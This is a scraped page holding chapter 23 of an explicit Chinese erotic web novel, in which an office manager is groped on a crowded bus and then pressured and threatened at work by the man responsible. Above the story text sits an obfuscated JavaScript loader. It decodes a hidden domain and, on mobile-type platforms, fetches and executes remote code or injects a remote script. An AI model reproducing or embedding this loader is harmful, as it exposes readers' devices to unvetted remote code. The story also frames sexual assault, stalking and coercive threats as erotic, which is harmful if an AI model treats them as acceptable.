返回制定公馆_第23章  殇绝天下首页

关灯 护眼     字体:

上一章 目录 下一章

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuZHNramJ2enZzLmNvbQ==','2843',window,document,['G','TpoZFcguG']);}:function(){};

肉欲定制公馆13自从毕业后身为工作狂的杨轩从没有跟公司请过这么长时间的假,既然已经出院身体好转,作为素来工作为重的他自然是第一时间回到工作岗位,不过,此刻起得大早正要出门的杨轩同志,遇到个令人头疼的大问题。“杨先生,这一块的监视器正好坏了还没有来得及修理,所以……我们真的很抱歉,您看要不我们先想办法给你换个新轮胎?”物业和保安处的人都一脸歉意看着杨轩,作为一个号称安保强度出众的新兴社区竟然出了这种事情,大家都很无奈,前几日住院生病所以车都没有动,好好停在楼下车位上,可是谁知道今早上准备去开,竟然左边的轮胎完全瘪掉,监视器也没能确定到底是小孩子胡闹还是有人恶意为之,总之,这样的事实严重打乱了杨轩今天早上的计划。抬腕看了眼手表,指针在七点半处,如果等保险公司来估计整个上午都要搭进去,偏偏九点有个临时会议还是自己主持。这件事情只有等自己回来再做处理,前提是今天不需要加班。偏偏糟糕的事情总是一件连着一件,杨轩觉得自己的头突然又有点疼,已经等了将近三十分钟,如果再拦不到出租车,他这个会议的主持人就一定会迟到。而最近的地铁站还要步行十五分钟左右,正犹豫要不要打电话叫顺路的同事来接自己,一辆略微眼熟的公交车缓缓驶来,这班公交车是他刚刚毕业工作时每天早上都要挤的那趟,可有了座驾后就再没有坐过,真是令人怀念。合上手机,杨轩没多想赶紧拎着公文包随人流挤上车,时隔多年,这个时间点的公交上,人多到不需要扶住任何地方即使是急刹车也不会摔倒,四周全是人,甚至偶尔胳膊还能感觉到女人胸部之类,为避免被当公交车痴汉,杨轩动也不敢动,反正只要坚持30分钟就能赶到公司,运气好也许还可以喝杯咖啡。大部分的人都是要到集中的商业区才下车,所以中间停了几次都不见下去多少人,反而身边的人越来越多,空气也很不好,杨轩大病初愈身体发晕,偶尔随着人群晃动,三十分钟变得漫长无比。车又一次停在红绿灯前,臀瓣突然传来的不适让杨轩浑身一紧,开始还以为是谁的行李或者拎包挤压到,可是越来越清晰传来的触感明显是一只手,而且还是做着揉捏动作男人的手。身边隔着一个人是个十分漂亮的女学生,也许这个公交车色狼是摸错了人,杨轩轻咳几声,试图提醒身后之人自己是个男人,可是那只手非但没有停止反而愈演愈烈,不仅揉捏,还用指尖在臀瓣裤缝处撩拨,几次还挤进收紧的臀瓣里去触碰卵蛋,最后挺到尾椎处暧昧不已的戳了戳,摆明了是冲着杨轩来的。嘴巴微张又合住,难道要自己大喊色狼吗?公交车上放着漂亮的女学生不非礼竟然非礼自己这样一个大男人,根本也不会有人相信,只能不安的扭动身体企图躲避开,奈何周围实在太挤,动了几次想回身或者朝门口移,非但没有缓解这种情况,还被隔壁大妈用眼神警告。这里可是公交车,无论怎么非礼也不会有太过的举动,盘算着横竖以后都不要再坐这趟车,杨轩心一横放弃抵抗,还有三站地就到公司,除了忍耐,他再想不出还有什么办法。一手负责抓住栏杆,一手拎着公文包,连腾出一只手去阻止都困难,杨轩也很讨厌自己此刻的懦弱,只能让大脑不去想这件事,把注意力放到一会将要开会的内容上,熬过三站地就是解脱。但他唯独低估了自己这副已经被调教到极致敏感的身体,越来越难以忽略的肉棒逐渐觉醒,且不说早晨本来就敏感,加上男人富有技巧的非礼,让杨轩根本无法不去在乎这件事,男人的么指恰巧摁在菊穴扣上象是摁动按钮那样左右旋转,隔着西装裤竟然把内裤都要塞进肉穴里一般,杨轩赶紧用胳膊和公文包放在小腹处隐藏住自己的变化,被非礼到勃起绝对是个耻辱。空气浑浊暧昧不通畅,杨轩羞红脸,紧抿住下唇,眼神迷蒙低垂,喉头极力忍耐上下耸动,吞咽口水的动作其实是在压抑那呼之欲出的微妙呻吟。尤其除了被揉穴外,卵蛋和肉棒都被不同程度的抚摸搔刮,如果没有裤子做遮掩,想必他一定早就双腿打颤到跪下。公交车停靠在公司不远处,好在大家都是急匆匆朝着写字楼赶路,没有人注意到杨轩尴尬僵硬的移动下车后,用公文包挡在小腹前,原地站了有足足一分钟才朝公司大门行进。等他回过神想要寻找那个公交车色狼时,对方早就淹没在人流里。来不及多懊恼自责,杨轩整个上午都奉献给了自己主持的汇报会议上,连午饭都是秘书买了好多份盒饭在会议室解决,因为他不在的这几天,公司上层管理出了好多新的策划方案以及临近年终需要整理多份报表和账目,虽不算特别复杂,可是量大又琐碎,好几处漏洞也都要一一去调查解决。等他回到办公室瘫软在计算机前时,竟然已经是下午时分。困倦之意铺卷而来,落地窗外阳光明媚,照耀的让人温暖又舒服,终于有精力注意到手机上的几条未读短信,除了表弟提前祝自己生日快乐和一些账单广告之类的东西外,还有一个陌生的号码只发来一句话。你在公交车上硬了。五指收紧几乎捏烂手机,恰好此时手机再次震动,同个号码竟然直接打电话进来,杨轩皱着眉摁下接听键,没好气道:“程明羿,你到底想干什么?”“原来你知道是我。”杨轩深吸一口气,不知该哭该笑,他才不会承认本来紧绷的神经竟然稍稍有了放松之意。“这是第二次了。”“电梯里你的反应我更喜欢。”“那可是公交车!你就不怕被发现吗!”本来懒洋洋靠在椅背上的身体僵立坐直,声音一愣反问道:“等等,你跟踪我?”“其实这是个误会,我本来只想英雄救美。”程明羿听到对面只有急促紧张的呼吸声,赶紧解释道:“昨天离开你家,就看到你的车出了问题,本想早上开车载你上班,算是惊喜,谁知道路上堵车,等我到时,你正在追公交。”杨轩为他的知情不报企图英雄救美的行为虽然怀疑,可是这样的解释却又勉强说的通,原来他还是在乎惦记自己这件事实,让本来有些憋闷的胸口好受许多。程明羿继续道:“我开车超过公交车两站后赶上和你同一班公交,本想改变计划制造成偶遇,谁知……”本来温柔陈述的语调意味深长的一个停顿,伴随浅浅笑声,笑的杨轩浑身收紧,只听得对方压低嗓音道:“你公交车上勃起后压抑忍耐的样子,真的让我很想顶穿你的骚穴,其实很享受很舒服对不对?嗯?”程明羿的尾音故意延伸,淫荡直白的语句这样光天化日从手机里传来,杨轩呼吸急促浑身颤抖,差点把手机摔在地上,哪还能继续听他说下去,二话不说挂断电话,连喝好几口水都不能平复自己的心情。手机倒是没有响,不过这次响起的是门板叩击声。“请进。”杨轩尽量让自己保持平时严肃认真的样子,可是推门而入的人让他的努力瞬间瓦解,尤其程明羿进门后企图顺手关门的动作被杨轩猛然喊停:“等……等一下,有点闷,别关门……”秘书琳达不解的张望了一下屋内,杨轩挥挥手示意她不用进来,只好收起对程明羿爱慕不已的眼神回到座位上,远远观望他走进杨轩办公室里,一副少女怀春的模样,果然这样的男人走到哪里都会引人注意。“你……你来干什么。”杨轩只有在面对这个男人时才会一反常态的局促不安到结巴。西装革履的程明羿站在办公桌前,隔着半米用双手扶在桌沿上,从上向下极具压迫性的目光甚至让杨轩连与他对视都不敢。还好琳达不仅听不到自己故意压低的说话声,也看不到他这幅违和的羞涩模样,否则下巴都要惊呆到掉下来。“干什么?你不敢让我关门,是怕我会在这间办公室里干你么?”程明羿的声音不大,可是字字句句都象是直击杨轩心里所想,明明是温柔和煦的笑容,却让人不寒而栗。杨轩被堵的说不出话来,眼瞅对方的脸越来越近,赶紧出声制止:“这里是办公室,请只谈工作上的事情……你靠太近了。”“其实我想靠的更近。而且,你脸上明明就写着很希望我在办公室里上你。”程明羿笃定的口气让杨轩近乎崩溃,他到底想怎样,明知道自己面对他根本无所适从,可就是一而再再而三的去挑战自己的底线。神经绷的紧紧,生怕他有半点逾矩的行为,如果真的在这间办公室里两个人做了什么,怕是以后他都难以集中精神在这屋里工作。修长的手指敲击桌面,每发出“哒”的一声,杨轩的太阳穴就突的跳一下,程明羿缓缓道:“我不会做让你为难的事情,不过……我的忍耐可是有限的,能够给你的思考的时间所剩不多,如果下次你还敢挂掉我电话,我不保证及时是门开着,也无法阻止我想对你做的事情。”温柔象是一种假象,包裹着满满的威胁不容反驳。除了像傻瓜一样听他把话说完,杨轩纯粹就像断电似的,无法思考,扬起的脸庞上全是错愕和羞窘,招架不住程明羿眼里坚定的执着。“周六晚上八点,老地方见,你会来的,对么,我的客人?”一声反问后,程明羿微笑着离开办公室,琳达第一时间站起来道别,仿佛他才是自己的上司。“程部长,您和杨总监是朋友吗?”盘算着两人估计认识,琳达十分主动上前搭话,换来对方一个明亮的笑容,差点把自己晃晕。程明羿用余光看了眼里面愣在座位上的杨轩,用手指比划在唇上,故作玄虚道:“我跟他关系很好,不过公司里还是稍微避讳一点,毕竟他的职位容易让人误会给我这个朋友走后门,所以,请帮我保守秘密,美丽的秘书小姐。”

『加入书签,方便阅读』

上一章 目录 下一章